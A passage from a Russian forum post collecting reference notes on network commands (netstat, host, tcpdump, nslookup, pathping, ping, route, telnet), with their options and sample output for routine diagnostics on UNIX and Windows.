сокеты, используемые серверными процессами, не показываются.<br />&#160; &#160; -A – показывать адреса любых управляющих блоков протокола, связанных с сокетами; используется для отладки.<br />&#160; &#160; -i – показывать состояние автоматически сконфигурированных (auto-configured) интерфейсов. Интерфейсы, статически сконфигурированные в системе, но не найденные во время загрузки, не показываются.<br />&#160; &#160; -n – показывать сетевые адреса как числа. netstat обычно показывает адреса как символы. Эту опцию можно использовать с любым форматом показа.<br />&#160; &#160; -r – показать таблицы маршрутизации. При использовании с опцией -s, показывает статистику маршрутизации.<br />&#160; &#160; -s – показать статистическую информацию по протоколам. При использовании с опцией -r, показывает статистику маршрутизации.<br />&#160; &#160; -f семейство_адресов – ограничить показ статистики или адресов управляющих блоков только указанным семейством_адресов, в качестве которого можно указывать:<br />&#160; &#160; inet Для семейства адресов AF_INET<br />&#160; &#160; unix Для семейства адресов AF_UNIX<br />&#160; &#160; -I интерфейс – выделить информацию об указанном интерфейсе в отдельный столбец; по умолчанию (для третьей формы команды) используется интерфейс с наибольшим объемом переданной информации с момента последней перезагрузки системы. В качестве интерфейса можно указывать любой из интерфейсов, перечисленных в файле конфигурации системы, например, emd1 или lo0.<br />&#160; &#160; -p имя_протокола –&#160; Ограничить показ статистики или адресов управляющих блоков только протоколом с указанным именем_протокола, например, tcp.</p> <p>&#160; &#160; Пример. показ таблицы маршрутизации:</p> <p>&#160; &#160; user@desktop ~$ netstat -r<br />&#160; &#160; Routing tables&#160; &#160;&#160; &#160;<br />&#160; &#160; Internet:<br />&#160; &#160; Destination&#160; &#160; &#160; &#160; Gateway&#160; &#160; &#160; &#160; &#160; &#160; Flags&#160; &#160; Refs&#160; &#160; &#160; Use&#160; Netif Expire<br />&#160; &#160; default&#160; &#160; &#160; &#160; &#160; &#160; 19-101.local&#160; &#160; &#160; &#160;UGS&#160; &#160; &#160; &#160; &#160;0&#160; 1373769&#160; &#160; rl0<br />&#160; &#160; localhost&#160; &#160; &#160; &#160; &#160; localhost&#160; &#160; &#160; &#160; &#160; UH&#160; &#160; &#160; &#160; &#160; 1&#160; &#160; &#160; 290&#160; &#160; lo0<br />&#160; &#160; 192.168.0&#160; &#160; &#160; &#160; &#160; link#1&#160; &#160; &#160; &#160; &#160; &#160; &#160;UC&#160; &#160; &#160; &#160; &#160; 0&#160; &#160; &#160; &#160; 0&#160; &#160; dc0<br />&#160; &#160; 192.168.19&#160; &#160; &#160; &#160; &#160;link#3&#160; &#160; &#160; &#160; &#160; &#160; &#160;UC&#160; &#160; &#160; &#160; &#160; 0&#160; &#160; &#160; &#160; 0&#160; &#160; rl0<br />&#160; &#160; 19-86.local&#160; &#160; &#160; &#160; localhost&#160; &#160; &#160; &#160; &#160; UGHS&#160; &#160; &#160; &#160; 0&#160; &#160; &#160; &#160; 0&#160; &#160; lo0<br />&#160; &#160; 19-101.local&#160; &#160; &#160; &#160;00:0d:bc:e4:27:bf&#160; UHLW&#160; &#160; &#160; &#160; 1&#160; &#160; &#160; &#160; 0&#160; &#160; rl0&#160; &#160; 116</p> <p>&#160; &#160; Internet6:<br />&#160; &#160; Destination&#160; &#160; &#160; &#160; Gateway&#160; &#160; &#160; &#160; &#160; &#160; Flags&#160; &#160; &#160; Netif Expire<br />&#160; &#160; localhost.prov.ru&#160; localhost.prov.ru&#160; UH&#160; &#160; &#160; &#160; &#160; lo0<br />&#160; &#160; fe80::%dc0&#160; &#160; &#160; &#160; &#160;link#1&#160; &#160; &#160; &#160; &#160; &#160; &#160;UC&#160; &#160; &#160; &#160; &#160; dc0<br />&#160; &#160; fe80::2a0:ccff:fe3 00:a0:cc:3d:1f:bd&#160; UHL&#160; &#160; &#160; &#160; &#160;lo0<br />&#160; &#160; fe80::%rl0&#160; &#160; &#160; &#160; &#160;link#3&#160; &#160; &#160; &#160; &#160; &#160; &#160;UC&#160; &#160; &#160; &#160; &#160; rl0<br />&#160; &#160; fe80::250:22ff:feb 00:50:22:bb:05:f1&#160; UHL&#160; &#160; &#160; &#160; &#160;lo0<br />&#160; &#160; fe80::%lo0&#160; &#160; &#160; &#160; &#160;fe80::1%lo0&#160; &#160; &#160; &#160; U&#160; &#160; &#160; &#160; &#160; &#160;lo0<br />&#160; &#160; fe80::1%lo0&#160; &#160; &#160; &#160; link#5&#160; &#160; &#160; &#160; &#160; &#160; &#160;UHL&#160; &#160; &#160; &#160; &#160;lo0<br />&#160; &#160; ff01::&#160; &#160; &#160; &#160; &#160; &#160; &#160;localhost.prov.ru&#160; U&#160; &#160; &#160; &#160; &#160; &#160;lo0<br />&#160; &#160; ff02::%dc0&#160; &#160; &#160; &#160; &#160;link#1&#160; &#160; &#160; &#160; &#160; &#160; &#160;UC&#160; &#160; &#160; &#160; &#160; dc0<br />&#160; &#160; ff02::%rl0&#160; &#160; &#160; &#160; &#160;link#3&#160; &#160; &#160; &#160; &#160; &#160; &#160;UC&#160; &#160; &#160; &#160; &#160; rl0<br />&#160; &#160; ff02::%lo0&#160; &#160; &#160; &#160; &#160;localhost.prov.ru&#160; UC&#160; &#160; &#160; &#160; &#160; lo0</p> <p>host</p> <p>&#160; &#160; Команда host служит для получения доменной информации о хосте: IP-адрес, MX-записи и другой информации, связанной с данным символьным именем. Имя хоста указывается в качестве аргумента команды.</p> <p>&#160; &#160; Пример работы команды:</p> <p>&#160; &#160; user@desktop ~$ host yandex.ru<br />&#160; &#160; yandex.ru has address 213.180.204.11<br />&#160; &#160; yandex.ru mail is handled by 10 mx2.yandex.ru.<br />&#160; &#160; yandex.ru mail is handled by 0 mx1.yandex.ru.</p> <p>&#160; &#160; Вторым аргументом можно указать DNS-сервер, который будет использоваться при получении этой информации:</p> <p>&#160; &#160; user@desktop ~$ host yandex.ru ns1.aiya.ru<br />&#160; &#160; Using domain server:<br />&#160; &#160; Name: ns1.aiya.ru<br />&#160; &#160; Address: 85.142.20.152#53<br />&#160; &#160; Aliases:</p> <p>&#160; &#160; yandex.ru has address 213.180.204.11<br />&#160; &#160; Using domain server:<br />&#160; &#160; Name: ns1.aiya.ru<br />&#160; &#160; Address: 85.142.20.152#53<br />&#160; &#160; Aliases:</p> <p>&#160; &#160; Using domain server:<br />&#160; &#160; Name: ns1.aiya.ru<br />&#160; &#160; Address: 85.142.20.152#53<br />&#160; &#160; Aliases:</p> <p>&#160; &#160; yandex.ru mail is handled by 0 mx1.yandex.ru.<br />&#160; &#160; yandex.ru mail is handled by 10 mx2.yandex.ru.</p> <p>tcpdump</p> <p>&#160; &#160; Команда tcpdump используется для мониторинга сети на канальном и более высоких уровнях. Программа «слушает» на одним или нескольких сетевых интерфейсах и выводит дамп пакетов, проходящих через этот интерфейс.</p> <p>&#160; &#160; Параметр -i задаёт имя сетевого интерфейса, на котором запускается прослушивание. При просмотре захватываемых данных удобно использовать ключ -l, который буферезует вывод построчно. Для этой команды также работает параметр -n, при использовании которого IP-адреса не будут заменяться символьными именами хостов. Пример работы команды:</p> <p>&#160; &#160; desktop ~ # tcpdump -i eth0 -l -n<br />&#160; &#160; tcpdump: verbose output suppressed, use -v or -vv for full protocol decode<br />&#160; &#160; listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes<br />&#160; &#160; 12:51:07.486755 arp who-has 0.0.0.0 (00:30:48:2b:6d:6a) tell 0.0.0.0<br />&#160; &#160; 12:51:12.486606 arp who-has 0.0.0.0 (00:30:48:2b:6d:6a) tell 0.0.0.0<br />&#160; &#160; 12:51:14.457608 IP 192.168.5.23.56385 &gt; 194.91.250.11.443: P 3645922938:3645923156(218) ack 2092518729 win 10086<br />&#160; &#160; 12:51:14.491343 IP 194.91.250.11.443 &gt; 192.168.5.23.56385: . ack 218 win 10720</p> <p>&#160; &#160; Для вывода расширенной информации о пакетах исплюзуются ключи -v или -vv.</p> <p>&#160; &#160; desktop ~ # tcpdump -i eth1 -l -n -vv<br />&#160; &#160; tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes<br />&#160; &#160; 12:57:53.043797 IP (tos 0x0, ttl&#160; 51, id 46031, offset 0, flags [DF], proto: TCP (6),<br />&#160; &#160; &#160; length: 286) 194.91.250.11.5190 &gt; 192.168.5.23.38993: P 2517343058:2517343292(234)<br />&#160; &#160; &#160; ack 2346573376 win 2202 &lt;nop,nop,timestamp 2713588760 497668&gt;<br />&#160; &#160; 12:57:53.043865 IP (tos 0x0, ttl&#160; 64, id 52382, offset 0, flags [DF], proto: TCP (6),<br />&#160; &#160; &#160; length: 52) 192.168.5.23.38993 &gt; 194.91.250.11.5190: ., cksum 0x1fd7 (correct),<br />&#160; &#160; &#160; 1:1(0) ack 234 win 11945 &lt;nop,nop,timestamp 506366 2713588760&gt;<br />&#160; &#160; 12:57:53.401516 IP (tos 0x0, ttl&#160; 48, id 45237, offset 0, flags [DF], proto: TCP (6),<br />&#160; &#160; &#160; length: 210) 194.91.250.11.443 &gt; 192.168.5.23.56385: P 2092522043:2092522213(170)<br />&#160; &#160; &#160; ack 3645927446 win 10720<br />&#160; &#160; ...</p> <p>&#160; &#160; Команда tcpdump обладает очень богатым интерфейсом, включающем условные выражения, по которым должны выделяться интересующие пакеты. Например, можно использовать условия удалённого порта (равно 80):</p> <p>&#160; &#160; desktop ~ # tcpdump -i eth1 -l -n -vv dst port 80<br />&#160; &#160; tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes<br />&#160; &#160; 13:55:36.563959 IP (tos 0x0, ttl&#160; 64, id 3936, offset 0, flags [DF], proto: TCP (6),<br />&#160; &#160; &#160; length: 60) 192.168.5.23.52348 &gt; 213.180.204.11.80: S, cksum 0x2766 (correct),<br />&#160; &#160; &#160; 3855548287:3855548287(0) win 5840 &lt;mss 1460,sackOK,timestamp 1372191 0,nop,wscale 2&gt;<br />&#160; &#160; 13:55:36.592654 IP (tos 0x0, ttl&#160; 64, id 3937, offset 0, flags [DF], proto: TCP (6),<br />&#160; &#160; &#160; length: 40) 192.168.5.23.52348 &gt; 213.180.204.11.80: ., cksum 0xebc5 (correct),<br />&#160; &#160; &#160; 3855548288:3855548288(0) ack 3869420799 win 5840<br />&#160; &#160; 13:55:36.592731 IP (tos 0x0, ttl&#160; 64, id 3938, offset 0, flags [DF], proto: TCP (6),<br />&#160; &#160; &#160; length: 627) 192.168.5.23.52348 &gt; 213.180.204.11.80: P 0:587(587) ack 1 win 5840<br />&#160; &#160; ...</p> <p>nmap</p> <p>&#160; &#160; Команда nmap – сетевой сканер, с помощью которого можно определить уязвимость удалённых хостов. Основное назначение этой программы – определение состояние портов удалённого хоста (закрыты они, открыты или заблокированны). Также программа может на основании собственной базы знаний определить по поведению удалённого хоста, какая операционная система запущена на нём.</p> <p>Команды удалённого терминала</p> <p>telnet</p> <p>&#160; &#160; telnet – программа сетевого терминала. <br />ssh</p> <p>&#160; &#160; Программа ssh является более современным и защищённым аналогом программы telnet. </p> <p>Команды по управлению сетевым экраном</p> <p>iptables</p> <p>&#160; &#160; Команда iptables является интерфейсом к межсетевому экрану ядра Linux. </p> <p>Резюме</p> <p>В этом разделе описываются основные команды по управлению и диагностике сети в UNIX.</p> <p>Ключевые термины: ifconfig, arp, route, ping, traceroute, netstat, host, tcpdump, nmap, telnet, ssh, iptables<br />Дополнительные материалы</p> <p>&#160; &#160; Курячий Г.В. Операционная система UNIX. – М.:Интуит.Ру, 2004. – 292 с.: ил.<br />&#160; &#160; Рейчардс К., Фостер-Джонсон Э. UNIX: справочник. – СПб.: Питер Ком, 1999. – 384 с.: ил.</p> mybb@mybb.ru (bash) Tue, 10 Mar 2015 14:14:14 +0300 https://antik.mybb.ru/viewtopic.php?pid=39#p39 https://antik.mybb.ru/viewtopic.php?pid=38#p38 <p>Утилита NSLOOKUP&#46;EXE</p> <p>&#160; &#160; Утилита NSLOOKUP присутствует во всех версиях операционных систем Windows и является классическим средством диагностики сетевых проблем, связанных с разрешением доменных имен в IP-адреса&#46; NSLOOKUP предоставляет пользователю возможность просмотра базы данных DNS-сервера и построения определенные запросов, для поиска нужных ресурсов DNS&#46; Практически, утилита выполняет функции службы DNS-клиент в командной строке Windows&#46;</p> <p>После запуска, утилита переходит в режим ожидания ввода&#46; Ввод символа ? или команды help позволяет получить подсказку по использованию утилиты&#46;</p> <p>Примеры использования&#58;</p> <p>nslookup - запуск утилиты<br />yandex&#46;ru&#46; - отобразить IP-адрес (а) узла с именем yandex&#46;ru &#46; Точка в конце имени желательна для минимизации числа запросов на разрешение имени к серверу DNS&#46; Если завершающей точки нет, то NSLOOKUP сначала попытается разрешить указанное имя как часть доменного имени компьютера, на котором она запущена&#46;<br />server 8&#46;8&#46;4&#46;4 - установить в качестве сервера имен DNS-сервер Google с IP-адресом 8&#46;8&#46;4&#46;4<br />yandex&#46;ru&#46; - повторить запрос с использованием разрешения имени DNS-сервером Google&#46;<br />set type=MX - установить тип записи MX<br />yandex&#46;ru&#46; - отобразить MX-запись для домена yandex&#46;ru - В примере узел обмена почтой для домена - mx&#46;yandex&#46;ru<br />mx&#46;yandex&#46;ru&#46; - отобразить информацию по mx&#46;yandex&#46;ru<br />set type=A - установить тип записи в A<br />mx&#46;yandex&#46;ru - получить IP-адреса для mx&#46;yandex&#46;ru &#46;<br />exit - завершить работу с nslookup</p> <p>Возможно использование утилиты NSLOOKUP не в интерактивном режиме&#58;</p> <p>nslookup odnoklassniki&#46;ru - определить IP-адрес узла odnokassniki&#46;ru с использованием сервера DNS, заданного настройками сетевого подключения&#46;<br />nslookup odnoklassniki&#46;ru 8&#46;8&#46;8&#46;8 - определить IP-адрес узла odnokassniki&#46;ru с использованием DNS-сервера 8&#46;8&#46;8&#46;8 (публичный DNS-сервер Google)<br />nslookup 8&#46;8&#46;8&#46;8 - определить имя узла, IP-адрес которого равен 8&#46;8&#46;8&#46;8 с использованием DNS-сервера, заданного настройками сетевого подключения&#46;</p> <p>Команда nslookup - отдельная статья с описанием команды NSLOOKUP&#46;<br /><br /></p> <p>Утилита PATHPING&#46;EXE</p> <p>&#160; &#160; Команда PATHPING выполняет трассировку маршрута к конечному узлу аналогично команде TRACERT , но дополнительно, выполняет отправку ICMP-эхо запросов на промежуточные узлы маршрута для сбора информации о задержках и потерях пакетов на каждом из них&#46;</p> <p>При запуске PATHPING без параметров, отображается краткая справка&#58;</p> <p>pathping [-g Список] [-h Число_прыжков] [-i Адрес] [-n] [-p Пауза] [-q Число_запросов] [-w Таймаут] [-P] [-R] [-T] [-4] [-6] узел</p> <p>Параметры&#58;<br />-g Список При прохождении по элементам списка узлов игнорировать предыдущий маршрут&#46; Максимальное число адресов в списке равно 9 &#46; Элементы списка помещаются в специальное поле заголовка отправляемых ICMP-пакетов&#46;<br />-h Число_прыжков - Максимальное число прыжков при поиске узла&#46; Значение по умолчанию - 30<br />-i Адрес - Использовать указанный адрес источника в отправляемых ICMP-пакетах&#46;<br />-n - Не разрешать адреса в имена узлов&#46;<br />-p Пауза - Пауза между отправками (мсек) пакетов&#46; Значение по умолчанию - 250&#46;<br />-q Число_запросов Число запросов для каждого узла&#46; По умолчанию - 100<br />-w Таймаут - Время ожидания каждого ответа (мсек)&#46; Значение по умолчанию - 3000<br />-R - Тестировать возможность использования RSVP ( Reservation Protocol, протокола настройки резервирования ресурсов), который позволяет динамически выделять ресурсы для различных видов трафика&#46;<br />-T - Тестировать на возможность использования QoS (Quality of Service - качество обслуживания) - системы обслуживания пакетов разного содержания с учетом их приоритетов доставки получателю&#46;<br />-4 - Принудительно использовать IPv4&#46;<br />-6 - Принудительно использовать IPv6&#46;</p> <p>Практически, PATHPING, запущенная на выполнение с параметрами по умолчанию, выполняет те же действия, что и команда TRACERT плюс команды PING для каждого промежуточного узла с указанием числа эхо-запросов, равным 100 (ping -n 100 &#46; &#46; &#46; )</p> <p>Пример результатов выполнения команды pathping yandex&#46;ru &#58;</p> <p>Трассировка маршрута к yandex&#46;ru [77&#46;88&#46;21&#46;11] с максимальным числом прыжков 30&#58;<br />1 192&#46;168&#46;1&#46;1<br />2 180&#46;84&#46;250&#46;11<br />3 180&#46;84&#46;250&#46;53<br />4 80&#46;184&#46;112&#46;25<br />5 msk-ix-m9&#46;yandex&#46;net [193&#46;232&#46;244&#46;93]<br />6 l3-s900-dante&#46;yandex&#46;net [213&#46;180&#46;213&#46;70]<br />7 s600-s900&#46;yandex&#46;net [213&#46;180&#46;213&#46;54]<br />8 yandex&#46;ru [77&#46;88&#46;21&#46;11]</p> <p>Подсчет статистики за&#58; 200 сек&#46; &#46; &#46; &#46;<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Исходный узел&#160; &#160; &#160; &#160; &#160; &#160; &#160;Маршрутный узел<br />Прыжок&#160; &#160; &#160; &#160;RTT&#160; &#160; &#160; &#160; &#160; Утер&#46;/Отпр&#46; %&#160; &#160; &#160; &#160; &#160; Утер&#46;/Отпр&#46; %&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Адрес</p> <p>1&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;1мс&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; 192&#46;168&#46;1&#46;1<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160;|<br />2&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;5мс&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; 180&#46;84&#46;250&#46;11<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160;|<br />3&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;11мс&#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 3/ 100 = 3%&#160; &#160; &#160; &#160; &#160; 180&#46;84&#46;250&#46;53<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;8/ 100 = 8%&#160; &#160; &#160; &#160; &#160; &#160;|<br />4&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;4мс&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; 80&#46;184&#46;112&#46;25<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160;|<br />5&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;8мс&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; msk-ix-m9&#46;yandex&#46;net [193&#46;232&#46;244&#46;93]<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160;|<br />6&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;12мс&#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; l3-s900-dante&#46;yandex&#46;net [213&#46;180&#46;213&#46;70]<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160;|<br />7&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;5мс&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; s600-s900&#46;yandex&#46;net [213&#46;180&#46;213&#46;54]<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160;|<br />8&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;2мс&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0/ 100 = 0%&#160; &#160; &#160; &#160; &#160; yandex&#46;ru [77&#46;88&#46;21&#46;11]</p> <p>В приведенном примере красным цветом выделен проблемный участок маршрута к конечному узлу с потерей 8% пакетов&#46;<br />При интерпретации результатов выполнения pathping нужно учитывать тот факт, что некоторые маршрутизаторы могут быть настроены на блокировку icmp-трафика, что не позволяет правильно отработать трассировку, и получить по ним статистические данные&#46;<br /></p> <p>Утилита PING&#46;EXE</p> <p>&#160; &#160; PING&#46;EXE - это, наверно, наиболее часто используемая сетевая утилита командной строки&#46; Существует во всех версиях всех операционных систем с поддержкой сети и является простым и удобным средством опроса узла по имени или его IP-адресу&#46;</p> <p>Для обмена служебной и диагностической информацией в сети используется специальный протокол управляющих сообщений ICMP (Internet Control Message Protocol)&#46; Команда ping позволяет выполнить отправку управляющего сообщения типа Echo Request (тип равен 8 и указывается в заголовке сообщения) адресуемому узлу и интерпретировать полученный от него ответ в удобном для анализа виде&#46; В поле данных отправляемого icmp-пакета обычно содержатся символы английского алфавита&#46; В ответ на такой запрос, опрашиваемый узел дожжен отправить icmp-пакет с теми же данными, которые были приняты, и типом сообщения Echo Reply (код типа в заголовке равен 0) &#46; Если при обмене icmp-сообщениями возникает какая-либо проблема, то утилита ping выведет информацию для ее диагностики&#46;</p> <p>Формат командной строки&#58;</p> <p>ping [-t] [-a] [-n число] [-l размер] [-f] [-i TTL] [-v TOS] [-r число] [-s число] [[-j списокУзлов] | [-k списокУзлов]] [-w таймаут] конечноеИмя</p> <p>Параметры&#58;</p> <p>-t - Непрерывная отправка пакетов&#46; Для завершения и вывода статистики используются комбинации клавиш Ctrl + Break (вывод статистики), и Ctrl + C (вывод статистики и завершение)&#46;<br />-a - Определение адресов по именам узлов&#46; -n число - Число отправляемых эхо-запросов&#46;<br />-l размер - Размер поля данных в байтах отправляемого запроса&#46;<br />-f - Установка флага, запрещающего фрагментацию пакета&#46;<br />-i TTL - Задание срока жизни пакета (поле &quot;Time To Live&quot;)&#46;<br />-v TOS - Задание типа службы (поле &quot;Type Of Service&quot;)&#46;<br />-r число - Запись маршрута для указанного числа переходов&#46;<br />-s число - Штамп времени для указанного числа переходов&#46;<br />-j списокУзлов - Свободный выбор маршрута по списку узлов&#46;<br />-k списокУзлов - Жесткий выбор маршрута по списку узлов&#46;<br />-w таймаут - Максимальное время ожидания каждого ответа в миллисекундах&#46;</p> <p>Примеры использования&#58;</p> <p>ping 8&#46;8&#46;8&#46;8 - выполнить опрос узла с IP-адресом 8&#46;8&#46;8&#46;8 с параметрами по умолчанию&#46;<br />ping -t yandex&#46;ru - выполнять ping до нажатия комбинации CTRL+C, При нажатии CTRL+Break - выдается статистика и опрос узла продолжается<br />ping -n 1000 -l 500 192&#46;168&#46;1&#46;1 - выполнить ping 1000 раз с использованием сообщений, длиной 500 байт&#46;<br />ping -a -n 1 -r 9 -w 1000 yandex&#46;ru - выполнить ping 1 раз (ключ -n 1), определять адрес по имени (ключ -a), выдавать маршрут для первых 9 переходов (-r 9), ожидать ответ 1 секунду (1000мсек)</p> <p>Использование ключа -r позволяет получить трассировку маршрута, аналогичную получаемой с помощью команды tracert, но число промежуточных узлов не может превышать 9 &#46;<br /></p> <p>Утилита ROUTE&#46;EXE</p> <p>&#160; &#160; Утилита ROUTE&#46;EXE используется для просмотра и модификации таблицы маршрутов на локальном компьютере&#46; При запуске без параметров, на экран выводится подсказка по использованию route&#58;</p> <p>route [-f] [-p] [команда [конечная_точка] [mask маска_сети] [шлюз] [metric метрика]] [if интерфейс]]</p> <p>-f - используется для сброса таблицы маршрутизации&#46; При выполнении команды route -f из таблицы удаляются все маршруты, которые не относятся к петлевому интерфейсу (IP 127&#46;0&#46;0&#46;1 маска -255&#46;0&#46;0&#46;0), не являются маршрутами для многоадресной (multicast) рассылки (IP 224&#46;0&#46;0&#46;1 маска 255&#46;0&#46;0&#46;0) и не являются узловыми маршрутами (маска равна 255&#46;255&#46;255&#46;255) &#46;</p> <p>-p - используется для добавления в таблицу постоянного маршрута&#46; Если маршрут добавлен без использования параметра -p то он сохраняется только до перезагрузки системы (до перезапуска сетевого системного программного обеспечения)&#46; Если же, при добавлении маршрута искользовался данный параметр, то информация о маршруте записывается в реестр Windows (раздел HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes ) и будет использоваться постоянно при активации сетевых интерфейсов&#46;</p> <p>команда - козможно использование команд add - добавление маршрута, change - изменение существующего маршрута, delete - удаление маршрута или маршрутов, print - отображение текущей таблицы маршрутов</p> <p>конечная_точка - IP-адрес, адрес сети или адрес 0&#46;0&#46;0&#46;0 для шлюза по умолчанию&#46;</p> <p>mask маска_сети - маска сети&#46;</p> <p>шлюз - IP-адрес шлюза, через который будет выполняться отправка пакета для достижения конечной точки&#46;</p> <p>metric число - значение метрики (1-9999)&#46; Метрика представляет собой числовое значение, позволяющее оптимизировать доставку пакета получателю, если конечная точка маршрута может быть достижима по нескольким разным маршрутам&#46; Чем меньше значение метрики, тем выше приоритет маршрута&#46;</p> <p>if интерфейс - идентификатор сетевого интерфейса&#46; Может задаваться в виде десятичного или шестнадцатеричного числа&#46; Посмотреть идентификаторы можно с помщью команды route print</p> <p>Примеры &#58;</p> <p>route print - отобразить текущую таблицу маршрутов</p> <p>route print 192&#46;* - отобразить таблицу маршрутов только для адресов, начинающихся с 192&#46;</p> <p>route add 0&#46;0&#46;0&#46;0 mask 0&#46;0&#46;0&#46;0 192&#46;168&#46;1&#46;1 - установить в качестве шлюза по умолчанию (основного шлюза) адрес 192&#46;168&#46;1&#46;1</p> <p>route -p add 10&#46;0&#46;0&#46;0 mask 255&#46;0&#46;0&#46;0 10&#46;0&#46;0&#46;1 - добавить маршрут для подсети 10&#46;0&#46;0&#46;0/255&#46;0&#46;0&#46;0 и запомнить его в реестре &#46; Постоянный статический маршрут&#46;</p> <p>route delete 10&#46;0&#46;0&#46;0 mask 255&#46;0&#46;0&#46;0 - удалить маршрут для подсети 10&#46;0&#46;0&#46;0/255&#46;0&#46;0&#46;0 &#46;</p> <p>route add 10&#46;10&#46;10&#46;10 192&#46;168&#46;1&#46;158 - добавить маршрут для узла с IP-адресом 10&#46;10&#46;10&#46;10 &#46; Если маска в команде не задана, то подразумевается ее значение равное 255&#46;255&#46;255&#46;255 , т&#46;е конечная точка назначения является одиночным IP-адресом узла&#46;</p> <p>route delete 10&#46;10&#46;10&#46;10 - удалить маршрут созданный предыдущей командой</p> <p>route change 10&#46;0&#46;0&#46;0 mask 255&#46;0&#46;0&#46;0 10&#46;10&#46;10&#46;1 - изменить адрес перехода для существующего маршрута к сети 10&#46;0&#46;0&#46;0/255&#46;0&#46;0&#46;0 на значение 10&#46;10&#46;10&#46;1</p> <p>route -f - очистить таблицу маршрутов&#46; После перезагрузки системы, или при перезапуске сетевых подключений таблица маршрутов будет восстановлена исходя из текущей сетевой конфигурации компьютера&#46;<br /><br /></p> <p>Утилита TELNET&#46;EXE</p> <p>&#160; &#160; На заре развития сети Интернет, сервис TELNET был основным средством удаленной работы пользователей, реализующим взаимодействие терминала с процессом на удаленном компьютере&#46; На сегодняшний день, TELNET, в основном, используется как средство удаленного администрирования специализированных сетевых устройств&#46; Сервис TELNET входит в состав практически всех сетевых операционных систем и реализован в виде программного обеспечения сервера Telnet и клиентской оболочки с текстовым или графическим интерфейсом&#46; Подключившись к серверу, удаленный пользователь получает доступ к командной строке, поддерживаемой сервером, таким же образом, как если-бы он работал с локальным терминалом&#46; Утилита TELNET работает поверх протокола TCP и позволяет пользователю подключиться к удаленному узлу не только на 